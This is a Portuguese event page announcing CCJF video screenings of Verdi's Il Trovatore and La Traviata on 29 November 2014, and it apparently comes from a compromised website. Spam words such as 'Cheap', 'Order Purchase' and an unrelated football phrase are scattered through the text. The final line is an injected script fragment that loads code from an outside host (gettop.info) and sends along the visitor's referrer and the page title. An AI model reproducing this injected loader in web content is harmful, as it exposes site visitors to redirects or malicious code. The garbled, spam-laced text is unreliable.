Escrito por em 7 nov 2014 nas áreas Cinema, Lateral, Programação, Rio de Janeiro

A cada encontro um desafio.

 

SERVIÇO

 

 

Cinema Cultural Justiça Federal

Dia 29 de novembro de 2014, sábado, às 14 e às 16h.

Ingressos R$ 10,00 e R$ 5,00 (meia) para cada sessão. Order Purchase

Livre para todas as idades.

Programação musical sujeita a alterações sem aviso prévio.

 

 

Amigos dos concertos em vídeo dos Desafios Musicais no Cinema do CCJF, é com prazer que convidamos vocês para a nossa décima primeira apresentação do ano, no dia 29 de novembro, sábado nas duas sessões, quando teremos duas óperas de Giuseppe Verdi, editadas pelo Professor Rodolfo Valverde.

A série de vídeo concertos Desafios Musicais no CCJF homenageia, o grande mestre da ópera romântica italiana Giuseppe Verdi (1813-1901), com um programa especial abrangendo duas de suas principais obras:  Il Trovatore e La Traviata.

Verdi dominou a cena musical italiana durante as décadas centrais do século XIX, após a era belcantista caracterizada pelas óperas de Rossini, Bellini e Donizetti. Partindo dos modelos herdados de seus antecessores, Verdi trilhou novos caminhos à procura de uma íntima coesão entre texto e música, produzindo obras de qualidade e profundidade. Seu engajamento político é demonstrado através das óperas de sua primeira fase, quando se torna figura emblemática na luta pela reunificação italiana.

No encontro deste sábado, assistiremos a duas de suas obras mais populares e características de sua segunda fase criativa: Il Trovatore e La Traviata Order . Estreadas no mesmo ano com intervalo de apenas dois meses, incorporam universos estéticos e dramáticos distintos, estabelecendo uma ponte entre o melodrama romântico e o emergente realismo.

Com livreto de Salvatore Cammarano inspirado em uma peça de Antonio Garcia Gutierrez, Il Trovatore estreou com sucesso em Roma, em janeiro de 1853. Apesar de inverossimilhanças do enredo, situado na Espanha renascentista, encontramos Verdi no auge de sua inspiração, enriquecendo as tradições operísticas italianas da primeira metade do século XIX e incluindo alguns dos papéis mais intensos e difíceis saídos da pena do compositor.

Estreada em Veneza, em março do mesmo ano, La Traviata é baseada no célebre drama La Dame aux Camélias, de Alexandre Dumas Filho. O livreto de Francesco Maria Piave oferece a Verdi oportunidades para uma escrita musical de extraordinária riqueza e poder de caracterização, especialmente da protagonista, Violetta, em sua jornada de transformação física e psicológica.

A soprano russa Anna Netrebko, demonstra suas múltiplas facetas como intérprete nas produções modernas e instigantes realizadas no Festival de Salzburgo (La Traviata) e na Staatsoper de Berlim (Il Trovatore), regida por Carlo Rizzi e Daniel Barenboim, respectivamente. No  descargar frases de futbol Trovatore, a estreia de Plácido Domingo no papel para barítono do Conde di Luna.

A produção é de Saulo Chermont, com apresentação e palestra nas duas sessões, do professor universitário Rodolfo Valverde.

Na primeira sessão, das 14 às 16 horas:  Cheap Il Trovatore, de Giuseppe Verdi, com Anna Netrebko, Gaston Rivero, Plácido Domingo, Marina Prudenskaya e a Staatskapelle Berlin, regidos por Daniel Barenboim, com direção cênica de Philipp Stölzl.

Na segunda sessão, das 16 às 18 horas: La Traviata, de Giuseppe Verdi, com Anna Netrebko, Rolando Villazón, Thomas Hampson e a Wiener Philharmoniker, regidos por Carlo Rizzi, com encenação de Willy Decker.

 

Il trovatore – Anna Netrebko em “Timor di me? D’amor sull’ ali rose”
Wiener Philarmoniker – Regência de Daniele Gatti
https://www.youtube.com/watch?v=VI5i8L46YD8

 

Cheap La traviata – Anna Netrebko em “Sempre libera”
Orquestra do Festival de Salzburg – Regência de Carlo Rizzi

 

 

Cheap

Apoio Institucional Purchase Patrocínio Realização
incentivo %C3%A0 cultura Ministério da Cultura, a Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais CCJF cor 100 Ministério da Cultura, a Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais klabin 150 Ministério da Cultura, a Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais Brasil... Ministério da Cultura, a Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais

 

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;